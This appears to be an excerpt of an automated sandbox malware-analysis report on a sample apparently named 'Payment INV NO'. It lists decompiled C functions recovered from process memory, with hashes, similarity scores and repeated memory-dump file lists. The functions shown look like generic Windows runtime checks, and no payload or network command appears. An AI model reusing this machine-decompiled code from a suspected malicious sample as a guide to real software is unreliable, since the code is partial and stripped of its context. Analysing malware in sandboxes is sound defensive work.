                                                          • Opcode ID: 8b22087f382df9c2ad335ff5a8e1ce0bd75344d675c74dae2508c58a06ae442f
                                                          • Instruction ID: eebc13cce6cb98e2bcb284c7d540dd03b589cb4f1f80c2c221f2bcc93e78f1ba
                                                          • Opcode Fuzzy Hash: 8b22087f382df9c2ad335ff5a8e1ce0bd75344d675c74dae2508c58a06ae442f
                                                          • Instruction Fuzzy Hash: A1E02B31200187A3CF32AA48D545BB6F399AF91724F59C071E4028F651DB60DC59C3D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BE760 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017BE760(void* __ecx, void* __eflags, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __ecx;
				_t20 = __ecx;
				if(E017BC5D5(__ecx, _t18) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17711dc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L7:
						L018688F5(_t16, _t17, _t18, _t19, _t20, __eflags);
						L8:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L8;
					}
					goto L7;
				} else {
					return 1;
				}
			}









                                                          0x017be760
                                                          0x017be766
                                                          0x017be76f
                                                          0x01804014
                                                          0x01804018
                                                          0x01804029
                                                          0x01804029
                                                          0x0180402e
                                                          0x00000000
                                                          0x0180402e
                                                          0x01804023
                                                          0x01804027
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017be795
                                                          0x00000000
                                                          0x017be797

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fd1db4cb81054aa10847878b5f2691720b61c61ecc8b2674321143d879f7e61
                                                          • Instruction ID: f975e44798a7c6dc74710bd090eb6137f4ea91e536e94991abe51a36168b2ff2
                                                          • Opcode Fuzzy Hash: 0fd1db4cb81054aa10847878b5f2691720b61c61ecc8b2674321143d879f7e61
                                                          • Instruction Fuzzy Hash: 58F0A071594388DEEBA3D72CD944B61BBD89B05370F148465D60AC71A2CB74D980C260
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179F358 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E0179F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E017CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = E017B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                          0x0179f35d
                                                          0x0179f361
                                                          0x0179f367
                                                          0x0179f372
                                                          0x0179f38c
                                                          0x0179f38c
                                                          0x0179f394

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                          • Instruction ID: 5c5d487a45bc92816f96a7d3db9f532281444d9756e319af1fc27fb1f2e5fb1c
                                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                          • Instruction Fuzzy Hash: E1E0DF32A40118FBDB21AAD9AE09FAAFFADDB58B60F00019AFA04D7150D5649E00D2D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C4710 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017C4710(intOrPtr* _a4) {
				void* _t5;
				intOrPtr _t12;
				intOrPtr* _t14;

				_t5 = E017B7D50();
				if(_t5 != 0) {
					_t12 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x10));
					L3:
					 *_a4 = _t12;
					L4:
					return 1;
				}
				if( *0x7ffe0268 == _t5) {
					_t14 = _a4;
					if(L018464FB(_t14) >= 0) {
						goto L4;
					}
					 *_t14 = 1;
					return 0;
				}
				_t12 =  *0x7ffe0264;
				goto L3;
			}






                                                          0x017c4716
                                                          0x017c471d
                                                          0x01806655
                                                          0x017c4735
                                                          0x017c4738
                                                          0x017c473a
                                                          0x00000000
                                                          0x017c473a
                                                          0x017c4729
                                                          0x0180662d
                                                          0x01806639
                                                          0x00000000
                                                          0x00000000
                                                          0x01806641
                                                          0x00000000
                                                          0x01806641
                                                          0x017c472f
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef43d3ac7f8ba9345d3df0f5a13c46088ff573136aca657c660550cf416362e5
                                                          • Instruction ID: fe7230ecff28dee4640f2fec4068e3aa27b2c067ad399b60d6506b50c9bc0c0b
                                                          • Opcode Fuzzy Hash: ef43d3ac7f8ba9345d3df0f5a13c46088ff573136aca657c660550cf416362e5
                                                          • Instruction Fuzzy Hash: 08F0227A204305DFCB0ACF19D490AA5BBE5EF46760F10009CEC42CB391EB31EA81CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D5C70 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E017D5C70(intOrPtr _a4, char _a8) {
				void* __ebp;
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_t13 = _a4;
				if(_t13 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return L018688F5(_t12, _t13, _t14, _t15, _t16, __eflags);
				} else {
					_push(4);
					_push( &_a8);
					_push(0xe);
					_push( *((intOrPtr*)(_t13 + 0x24)));
					return E017DAE70();
				}
			}









                                                          0x017d5c75
                                                          0x017d5c7a
                                                          0x00000000
                                                          0x017d5c91
                                                          0x017d5c91
                                                          0x017d5c96
                                                          0x017d5c97
                                                          0x017d5c99
                                                          0x00000000
                                                          0x017d5c9c

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f5931917fefbb291af3d42ef07fee472ca6bc023ebc16f6391a0a285e68375d
                                                          • Instruction ID: c4c6d25aa7ce4872889e1e4c16c90d661978f5224527e1a8b4d234c3d463758f
                                                          • Opcode Fuzzy Hash: 8f5931917fefbb291af3d42ef07fee472ca6bc023ebc16f6391a0a285e68375d
                                                          • Instruction Fuzzy Hash: 07E04F7110034EAFFB11DB49C649F25BFB9AB44720F04C555A61D8B161C774D984CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AFF60 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017AFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x17711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return L018688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E017B0050(_t14);
				}
			}










                                                          0x017aff66
                                                          0x017aff6b
                                                          0x00000000
                                                          0x017aff8f
                                                          0x00000000
                                                          0x017aff8f

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a5938645ca72dc142d56a3842bd0c212a613274ad7662af8915e82cfdf971fa
                                                          • Instruction ID: c1028eae87f142f03425c89512c8bc6f9ea9f920a7938cbcfc4451819158f678
                                                          • Opcode Fuzzy Hash: 5a5938645ca72dc142d56a3842bd0c212a613274ad7662af8915e82cfdf971fa
                                                          • Instruction Fuzzy Hash: 15E0DFB02093049FDB35DB59E0C0F2DFBAC9B92721F99826DF0084B102C621D880C286
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C3F33 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017C3F33(void* __ecx, signed char _a4) {
				signed int _t12;

				if(( *(__ecx + 0x40) & 0x75010f63) != 2 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					return 0;
				} else {
					if((_a4 & 0x00000001) != 0) {
						_t12 = 1;
					} else {
						_t12 =  *0x1886240; // 0x4
					}
					return 0x7d0 + _t12 * 0x3480;
				}
			}




                                                          0x017c3f43
                                                          0x00000000
                                                          0x017c3f54
                                                          0x017c3f58
                                                          0x017c3f70
                                                          0x017c3f5a
                                                          0x017c3f5a
                                                          0x017c3f5a
                                                          0x00000000
                                                          0x017c3f65

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
